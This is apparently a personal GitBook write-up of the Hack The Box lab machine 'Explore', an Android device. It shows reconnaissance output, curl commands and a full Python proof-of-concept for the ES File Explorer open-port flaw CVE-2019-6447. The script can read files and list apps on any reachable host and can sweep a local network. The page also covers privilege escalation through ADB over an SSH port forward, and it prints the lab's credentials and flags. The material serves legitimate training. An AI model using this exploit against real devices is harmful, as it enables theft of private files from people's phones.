# Disboard #
  • Reconnaissance
    • Quick Guide
    • Ports and Protocols
    • Passive Reconnaissance
    • Active Reconnaissance
  • Web
    • OWASP Top 10
    • OWASP API
    • SQL Injection
      • Microsoft SQL Injection
    • Cross Site Scripting
    • Browser Vulnerabilities
    • Steganography
    • Fuzzing
  • Linux
    • Privilege Escalation
    • Hydra
    • Password Cracking
    • Docker
    • Program Life Cycle
    • Snort
  • Windows
    • Privilege Escalation
    • Active Directory
    • Powershell
  • Exploitation
    • Shells
      • Upgrading Shells
    • Metasploit
      • Meterpreter
    • KOTH
    • Source Code Review
  • Hack the Box
    • ARCHETYPE
    • BASE
    • BASHED
    • EXPLORE
    • NIBBLES
  • Try Hack Me
    • ADVENTURE TIME
    • HACKFINITY
    • MOTHER'S SECRET
    • OFFSEC
    • POSTEXPLOIT
    • ROASTED
    • TEMPEST
    • TRAVERSE
  • CompTIA
    • Network
      • 1.0 Networking Fundamentals
      • 2.0 Network Implementations
      • 3.0 Network Operations
      • 4.0 Network Security
      • 5.0 Network Troubleshooting
    • PenTest
  • SIEM
    • Splunk
    • Elastic
  • Wireless
    • Wi-Fi Hacking
  • Other
    • PicoCTF
    • SSH Tunneling
    • Life Hacks
    • My Pokémon API
    • Github
Powered by GitBook
On this page
  • Recon
  • Enumeration
  • Exploitation
  • Privilege Escalation
  1. Hack the Box

EXPLORE

10.10.10.247

PreviousBASHEDNextNIBBLES

Last updated 12 months ago

Recon

nmap-auto 10.10.10.247 all

PORT     STATE SERVICE VERSION
2222/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=8/31%Time=612E9C92%P=x86_64-pc-linux-gnu%r(NU
SF:LL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");

The only port is an ssh port open at 2222. It runs a independent service called "SSH-2.0-SSH Server - Banana Studio". Trying to access it requires entering a password, maybe there's something else. The full scan shows some other notable ports open, 5555 being a common port for android access using ADB. Then there's also an number of open ports such as 42135 and 59777 which are running interesting http like services on them. The service enumeration also confirms that the device is a phone.

PORT      STATE SERVICE VERSION
2222/tcp  open  EtherNetIP-1
5555/tcp  filtered freeciv
38177/tcp open  unknown
42135/tcp open  http    ES File Explorer Name Response httpd
46323/tcp open  unknown
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
Service Info: Device: phone

Enumeration

As part of my nmap-auto scan, it also conducts gobuster and nikto scans on applicable services such as http or https. The gobuster scan for port 59777 shows that there are a number of directories that exist but have "FORBIDDEN: No directory listing" blocks when trying to access on a web browser. Even if a web browser can't access it, maybe a formatted curl command can get past it. It also gives a good description of the directory structure that exists.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x ".html,.asp,.aspx,.php" -u http://10.10.10.247:59777 -o recon/gobuster_10.10.10.247_59777.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.247:59777
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2021/09/01 10:04:28 Starting gobuster
===============================================================
http://10.10.10.247:59777/bin (Status: 301) [Size: 63]
http://10.10.10.247:59777/cache (Status: 301) [Size: 67]
http://10.10.10.247:59777/config (Status: 301) [Size: 69]
http://10.10.10.247:59777/d (Status: 301) [Size: 59]
http://10.10.10.247:59777/data (Status: 301) [Size: 65]
http://10.10.10.247:59777/dev (Status: 301) [Size: 63]
http://10.10.10.247:59777/etc (Status: 301) [Size: 63]
http://10.10.10.247:59777/init (Status: 403) [Size: 31]
http://10.10.10.247:59777/lib (Status: 301) [Size: 63]
http://10.10.10.247:59777/oem (Status: 301) [Size: 63]
http://10.10.10.247:59777/proc (Status: 301) [Size: 65]
http://10.10.10.247:59777/product (Status: 301) [Size: 71]
http://10.10.10.247:59777/sbin (Status: 301) [Size: 65]
http://10.10.10.247:59777/storage (Status: 301) [Size: 71]
http://10.10.10.247:59777/sys (Status: 301) [Size: 63]
http://10.10.10.247:59777/system (Status: 301) [Size: 69]
http://10.10.10.247:59777/vendor (Status: 301) [Size: 69]
===============================================================
2021/09/01 10:05:07 Finished
===============================================================
nikto -host 10.10.10.247:59777 | tee recon/nikto_10.10.10.247_59777.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.247
+ Target Hostname:    10.10.10.247
+ Target Port:        59777
+ Start Time:         2021-09-01 10:05:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ /bin/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /bin/post-query: Echoes back result of your POST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ ERROR: Error limit (20) reached for host, giving up. Last error: 
+ Scan terminated:  19 error(s) and 6 item(s) reported on remote host
+ End Time:           2021-09-01 10:07:28 (GMT-4) (140 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Okay, there's a lot of information to look at. The three services that need to be looked at are the following:

  • 2222: SSH-2.0-SSH Server - Banana Studio

  • 42135: ES File Explorer Name Response httpd

  • 59777: Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older

Exploitation

curl --header "Content-Type: application/json" --request POST --data '{"command":"<es-file-explorer-command>"}' http://<target-ip>:59777

curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://10.10.10.247:59777

The script is really just a more user friendly option of the above that allows a more clear understanding of what is going on. The following is the downloaded poc script:

poc.py
import json
import optparse
import requests
import sys

from socket import *

verbose = True


def sanitize_json(json):
    json = json.replace("\'", "\"")
    json = json.split('[')[1].split(']')[0]
    json = json[0:len(json)-6] + "}"
    return json


def get_file(addr, filepath):
    if verbose:
        print('[*] Getting file: ' + filepath + '\n\tfrom: ' + addr)
    session = requests.Session()

    headers = {"Content-Type": "application/json"}
    address = 'http://' + addr + ':59777' + filepath
    filename = filepath.rsplit('/', 1)[1]

    resp = session.get(address, headers=headers, verify=False)
    if verbose:
        print('[*] Server responded with: ' + str(resp.status_code))
    if resp and resp.status_code == 200:
        if verbose:
            print('[*] Writing to file: ' + filename)
        with open(filename, 'wb') as f:
            f.write(resp.content)


def execute_cmd(addr, cmd, package):
    if verbose:
        print('[*] Executing command: ' + cmd + ' on ' + addr)

    session = requests.Session()
    headers = {"Content-Type": "application/json"}
    address = 'http://' + addr + ':59777'

    if package != '':
        data = '{ "command":' + cmd + ', "appPackageName":' + package + ' }'
    else:
        data = '{ "command":' + cmd + ' }'

    resp = session.post(address, headers=headers, data=data, verify=False)
    if verbose:
        print('[*] Server responded with: ' + str(resp.status_code))
    if "NameNotFoundException" in resp.text:
        print('[!] Package \'' + package + '\' not found!')
        return
    if cmd not in ('getDeviceInfo', 'appLaunch', 'listAppsSdcard', 'listVideos', 'listFiles'):
        text = sanitize_json(resp.text)
    else:
        text = resp.text

    if resp and resp.status_code == 200:
        if cmd == 'getAppThumbnail':
            if verbose:
                print('[*] Getting app thumbnail: ' + package)
            with open(package + ".jpg", 'wb') as f:
                f.write(resp.content)
        elif cmd == 'appPull':
            if verbose:
                print('[*] Pulling app: ' + package)
            with open(package + ".apk", 'wb') as f:
                f.write(resp.content)
        else:
            print(text)


def is_up(addr):
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(1)
    if not s.connect_ex((addr, 59777)):
        s.close()
        return 1
    else:
        s.close()


def show_available_cmds():
    print('')
    print('######################')
    print('# Available Commands #')
    print('######################')
    print('')
    print('listFiles: List all the files')
    print('listPics: List all the pictures')
    print('listVideos: List all the videos')
    print('listAudios: List all the audio files')
    print('listApps: List all the apps installed')
    print('listAppsSystem: List all the system apps')
    print('listAppsPhone: List all the phone apps')
    print('listAppsSdcard: List all the apk files in the sdcard')
    print('listAppsAll: List all the apps installed (system apps included)')
    print('getDeviceInfo: Get device info. Package name parameter is needed')
    print('appPull: Pull an app from the device')
    print('appLaunch: Launch an app. Package name parameter is needed')
    print('getAppThumbnail: Get the icon of an app. Package name parameter is needed')
    print('')


def set_up_menu():
    parser = optparse.OptionParser()

    parser.add_option('-g', '--get-file',
                      action="store", dest="filepath",
                      help="Get file path", default="")
    parser.add_option('-c', '--cmd',
                      action="store", dest="cmd",
                      help="Command to execute", default="")
    parser.add_option('-p', '--pkg',
                      action="store", dest="package",
                      help="Package name", default="")
    parser.add_option('--ip', '--host',
                      action="store", dest="host",
                      help="Target host IP", default="")
    parser.add_option('-n', '--network',
                      action="store", dest="network",
                      help="Network to scan", default="192.168.0.")
    parser.add_option('-v', '--verbose',
                      action="store_true", dest="verb",
                      help="Loud stdout")

    return parser.parse_args()


def main():
    options, _ = set_up_menu()
    verbose = options.verb

    if len(sys.argv) > 1 and sys.argv[1] == 'list':
        show_available_cmds()
    elif options.filepath != '' or options.cmd != '':
        def scan_host(addr):
            if verbose:
                print('[*] Checking address: ' + addr)

            if is_up(addr):
                if verbose:
                    print('[+] Address is up: ' + addr)

                if options.filepath != '':
                    get_file(addr, options.filepath)
                elif options.cmd != '':
                    execute_cmd(addr, options.cmd, options.package)

        if options.host != '':
            scan_host(options.host)
        else:
            for ip in range(0, 255):
                scan_host(options.network + str(ip))
    else:
        print('Usage:')
        print('- python3 poc.py list')
        print('- python3 poc.py --get-file [filepath]')
        print('- python3 poc.py --cmd [cmd]')
        print('- python3 poc.py --cmd [cmd] --host [target_host]')
        print('- python3 poc.py --cmd [cmd] --network [network]')
        print('- python3 poc.py --cmd [cmd] --pkg [package_name]')
        print('- python3 poc.py --verbose --cmd [cmd] --pkg [package_name]')


if __name__ == '__main__':
    main()

The script requires a few libraries, so make sure to pip install those i.e. requests, pylint, autopep8. Using the correct format to execute a command python3 poc.py --host [target] --cmd [cmd], it's now easy to enumerate the target. The following is a collection of the different command output:

python poc.py --host 10.10.10.247 --cmd <cmd>

[*] Executing command: getDeviceInfo on 10.10.10.247
[*] Server responded with: 200
{"name":"VMware Virtual Platform", "ftpRoot":"/sdcard", "ftpPort":"3721"}
[*] Executing command: listFiles on 10.10.10.247
[*] Server responded with: 200
[
{"name":"lib", "time":"3/25/20 05:12:02 AM", "type":"folder", "size":"12.00 KB (12,288 Bytes)", }, 
{"name":"vndservice_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"65.00 Bytes (65 Bytes)", }, 
{"name":"vendor_service_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"vendor_seapp_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"vendor_property_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"392.00 Bytes (392 Bytes)", }, 
{"name":"vendor_hwservice_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"vendor_file_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"6.92 KB (7,081 Bytes)", }, 
{"name":"vendor", "time":"3/25/20 12:12:33 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", }, 
{"name":"ueventd.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"5.00 KB (5,122 Bytes)", }, 
{"name":"ueventd.android_x86_64.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"464.00 Bytes (464 Bytes)", }, 
{"name":"system", "time":"3/25/20 12:12:31 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", }, 
{"name":"sys", "time":"9/1/21 09:58:36 AM", "type":"folder", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"storage", "time":"9/1/21 09:58:42 AM", "type":"folder", "size":"80.00 Bytes (80 Bytes)", }, 
{"name":"sepolicy", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"357.18 KB (365,756 Bytes)", }, 
{"name":"sdcard", "time":"4/21/21 02:12:29 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", }, 
{"name":"sbin", "time":"9/1/21 09:58:36 AM", "type":"folder", "size":"140.00 Bytes (140 Bytes)", }, 
{"name":"product", "time":"3/24/20 11:39:17 PM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", }, 
{"name":"proc", "time":"9/1/21 09:58:35 AM", "type":"folder", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"plat_service_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"13.73 KB (14,057 Bytes)", }, 
{"name":"plat_seapp_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"1.28 KB (1,315 Bytes)", }, 
{"name":"plat_property_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"6.53 KB (6,687 Bytes)", }, 
{"name":"plat_hwservice_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"7.04 KB (7,212 Bytes)", }, 
{"name":"plat_file_contexts", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"23.30 KB (23,863 Bytes)", }, 
{"name":"oem", "time":"9/1/21 09:58:36 AM", "type":"folder", "size":"40.00 Bytes (40 Bytes)", }, 
{"name":"odm", "time":"9/1/21 09:58:36 AM", "type":"folder", "size":"220.00 Bytes (220 Bytes)", }, 
{"name":"mnt", "time":"9/1/21 09:58:37 AM", "type":"folder", "size":"240.00 Bytes (240 Bytes)", }, 
{"name":"init.zygote64_32.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"875.00 Bytes (875 Bytes)", }, 
{"name":"init.zygote32.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"511.00 Bytes (511 Bytes)", }, 
{"name":"init.usb.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"5.51 KB (5,646 Bytes)", }, 
{"name":"init.usb.configfs.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"7.51 KB (7,690 Bytes)", }, 
{"name":"init.superuser.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"582.00 Bytes (582 Bytes)", }, 
{"name":"init.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"29.00 KB (29,697 Bytes)", }, 
{"name":"init.environ.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"1.04 KB (1,064 Bytes)", }, 
{"name":"init.android_x86_64.rc", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"3.36 KB (3,439 Bytes)", }, 
{"name":"init", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"2.29 MB (2,401,264 Bytes)", }, 
{"name":"fstab.android_x86_64", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"753.00 Bytes (753 Bytes)", }, 
{"name":"etc", "time":"3/25/20 03:41:52 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", }, 
{"name":"dev", "time":"9/1/21 09:58:37 AM", "type":"folder", "size":"2.64 KB (2,700 Bytes)", }, 
{"name":"default.prop", "time":"9/1/21 09:58:36 AM", "type":"file", "size":"1.09 KB (1,118 Bytes)", }, 
{"name":"data", "time":"3/15/21 04:49:09 PM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", }, 
{"name":"d", "time":"9/1/21 09:58:35 AM", "type":"folder", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"config", "time":"9/1/21 09:58:37 AM", "type":"folder", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"charger", "time":"12/31/69 07:00:00 PM", "type":"file", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"cache", "time":"9/1/21 09:58:37 AM", "type":"folder", "size":"120.00 Bytes (120 Bytes)", }, 
{"name":"bugreports", "time":"12/31/69 07:00:00 PM", "type":"file", "size":"0.00 Bytes (0 Bytes)", }, 
{"name":"bin", "time":"3/25/20 12:26:22 AM", "type":"folder", "size":"8.00 KB (8,192 Bytes)", }, 
{"name":"acct", "time":"9/1/21 09:58:36 AM", "type":"folder", "size":"0.00 Bytes (0 Bytes)", }
]
[*] Executing command: listPics on 10.10.10.247
[*] Server responded with: 200

{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)"}
{"packageName":"com.android.cts.priv.ctsshim", "label":"com.android.cts.priv.ctsshim", "version":"8.1.0-4396705", "versionCode":"27", "location":"/system/priv-app/CtsShimPrivPrebuilt/CtsShimPrivPrebuilt.apk", "size":"23389", "status":"null", "mTime":"1585109423000"},
{"packageName":"com.android.internal.display.cutout.emulation.corner", "label":"Corner display cutout", "version":"1.0", "versionCode":"1", "location":"/vendor/overlay/DisplayCutoutEmulationCorner/DisplayCutoutEmulationCornerOverlay.apk", "size":"24926", "status":"null", "mTime":"1585109434000"},
{"packageName":"com.google.android.ext.services", "label":"Android Services Library", "version":"1", "versionCode":"1", "location":"/system/priv-app/GoogleExtServices/GoogleExtServices.apk", "size":"38634", "status":"null", "mTime":"1585109422000"},
{"packageName":"com.example.android.rssreader", "label":"RSS Reader", "version":"9", "versionCode":"28", "location":"/system/app/RSSReader/RSSReader.apk", "size":"16862", "status":"null", "mTime":"1585110267000"},
{"packageName":"com.android.internal.display.cutout.emulation.double", "label":"Double display cutout", "version":"1.0", "versionCode":"1", "location":"/vendor/overlay/DisplayCutoutEmulationDouble/DisplayCutoutEmulationDoubleOverlay.apk", "size":"24926", "status":"null", "mTime":"1585109434000"},
{"packageName":"com.android.providers.telephony", "label":"Mobile Network Configuration", "version":"9", "versionCode":"28", "location":"/system/priv-app/TelephonyProvider/TelephonyProvider.apk", "size":"414702", "status":"com.android.providers.telephony.TelephonyBackupAgent", "mTime":"1585110212000"},
{"packageName":"org.android_x86.analytics", "label":"AnalyticsService", "version":"9", "versionCode":"28", "location":"/system/priv-app/AnalyticsService/AnalyticsService.apk", "size":"340436", "status":"null", "mTime":"1585110076000"},
{"packageName":"com.google.android.googlequicksearchbox", "label":"Google App", "version":"7.2.26.21.x86", "versionCode":"300738799", "location":"/system/priv-app/Velvet/Velvet.apk", "size":"87116041", "status":"com.google.android.apps.gsa.launcher.GelBackupAgentHelper", "mTime":"1585109435000"},
{"packageName":"com.android.providers.calendar", "label":"Calendar Storage", "version":"9", "versionCode":"28", "location":"/system/priv-app/CalendarProvider/CalendarProvider.apk", "size":"688774", "status":"null", "mTime":"1585110100000"},
{"packageName":"com.android.providers.media", "label":"Media Storage", "version":"9", "versionCode":"900", "location":"/system/priv-app/MediaProvider/MediaProvider.apk", "size":"312802", "status":"null", "mTime":"1585110089000"},
{"packageName":"com.google.android.onetimeinitializer", "label":"Google One Time Init", "version":"9", "versionCode":"28", "location":"/system/priv-app/GoogleOneTimeInitializer/GoogleOneTimeInitializer.apk", "size":"579859", "status":"null", "mTime":"1585109422000"},
{"packageName":"com.google.android.ext.shared", "label":"Android Shared Library", "version":"1", "versionCode":"1", "location":"/system/app/GoogleExtShared/GoogleExtShared.apk", "size":"4831", "status":"null", "mTime":"1585109422000"},
{"packageName":"com.android.wallpapercropper", "label":"com.android.wallpapercropper", "version":"9", "versionCode":"28", "location":"/system/priv-app/WallpaperCropper/WallpaperCropper.apk", "size":"139935", "status":"null", "mTime":"1585110093000"},
{"packageName":"org.zeroxlab.util.tscal", "label":"Calibration", "version":"9", "versionCode":"28", "location":"/system/priv-app/TSCalibration2/TSCalibration2.apk", "size":"21100", "status":"null", "mTime":"1585110076000"},
{"packageName":"com.android.documentsui", "label":"Files", "version":"9", "versionCode":"28", "location":"/system/priv-app/DocumentsUI/DocumentsUI.apk", "size":"4485640", "status":"com.android.documentsui.prefs.BackupAgent", "mTime":"1585121815000"},
{"packageName":"com.android.externalstorage", "label":"External Storage", "version":"9", "versionCode":"28", "location":"/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk", "size":"61854", "status":"null", "mTime":"1585110076000"},
{"packageName":"com.android.htmlviewer", "label":"HTML Viewer", "version":"9", "versionCode":"28", "location":"/system/app/HTMLViewer/HTMLViewer.apk", "size":"20895", "status":"null", "mTime":"1585110262000"},
{"packageName":"com.android.companiondevicemanager", "label":"Companion Device Manager", "version":"9", "versionCode":"28", "location":"/system/app/CompanionDeviceManager/CompanionDeviceManager.apk", "size":"17103", "status":"null", "mTime":"1585110051000"},
{"packageName":"com.android.mms.service", "label":"MmsService", "version":"9", "versionCode":"28", "location":"/system/priv-app/MmsService/MmsService.apk", "size":"238050", "status":"null", "mTime":"1585110206000"},
{"packageName":"com.android.providers.downloads", "label":"Download Manager", "version":"9", "versionCode":"28", "location":"/system/priv-app/DownloadProvider/DownloadProvider.apk", "size":"889736", "status":"null", "mTime":"1585110101000"},
{"packageName":"com.android.defcontainer", "label":"Package Access Helper", "version":"9", "versionCode":"28", "location":"/system/priv-app/DefaultContainerService/DefaultContainerService.apk", "size":"29086", "status":"null", "mTime":"1585110068000"},
{"packageName":"com.android.providers.downloads.ui", "label":"Downloads", "version":"9", "versionCode":"28", "location":"/system/priv-app/DownloadProviderUi/DownloadProviderUi.apk", "size":"267144", "status":"null", "mTime":"1585110069000"},
{"packageName":"com.android.vending", "label":"Google Play Store", "version":"22.4.}

There are quite a few notable things in the output:

  • the ftpRoot is "/sdcard"

  • the listFiles command shows a number of interesting folders: lib, vendor, system, sys, storage, sdcard, sbin, mnt, etc, dev, data, config, bin, acct, ...

  • the listPics command has a photo called "creds.jpg", this has got to be something

First, let's pull the file called "creds.png", maybe it has something useful like a password for the ssh port.

python3 poc.py --host 10.10.10.247 --get-file /storage/emulated/0/DCIM/creds.jpg

Viewing it with xdg-open creds.jpg shows what looks like a username/password combination written on notebook paper:

username: kristi password: Kr1sT!5h@Rp3xPl0r3!

Maybe now it's possible to ssh into the box.

ssh kristi@10.10.10.247 -p 2222 Password: Kr1sT!5h@Rp3xPl0r3!

Great! The credentials worked and now the shell can be accessed. Since I'm not too familiar with the file structure of an android, I spent a while enumerating the machines directories. Noticing that the ftpRoot was "/sdcard", I decided to go look there. In it was what looked like user data as well as the user.txt file.

user.txt: f32017174c7c7e8f50c6da52891ae250

Privilege Escalation

After enumerating the shell obtained through ssh, it seems like there isn't a lot more to use. Since "Android Debug Bridge" (ADB) exists on port 5555 and is known as a privilege escalation method to get root, it's probably the route that needs to be taken. The biggest block in the beginning is that it's a filtered port so connecting from the localhost isn't possible. However, since ssh-ing into the box can be accomplished, port 5555 can now be accessed using port forwarding. Instead of doing a simple ssh command like the one used above, use ssh with local port forwarding to link the ports of the target and the localhost. This will make it so that when the user tries to access the target port, it can be accessed through the linked port on the localhost thus bypassing the filter.

  1. ssh kristi@10.10.10.247 -p 2222 -L 5555:localhost:5555

  2. adb connect localhost:5555

  3. adb shell

Awesome, escalating to root on adb was allowed! Now all that's left is to find the root.txt and this box is pwned. Using the command find / -iname "root.txt" 2>/dev/null showed exactly where it is at "/data/root.txt".

root.txt: f04fc82b6d49b41c9b08982be59338c5

The first service I checked is the "ES File Explorer Name Response" on port 42135. Googling the service, I found a vulnerability known as CVE:2019-6447 or [ES File Explorer 4.1.9.7.4 - Arbitrary File Read](). The github page itself is pretty verbose on the exploit documentation. It seems like it works by starting an HTTP server on port 59777. It shows that the actual command that is used to exploit the server is the following curl command (the second is an example using the command "getDeviceInfo" on the actual target):

https://github.com/fs0c131y/ESFileExplorerOpenPortVuln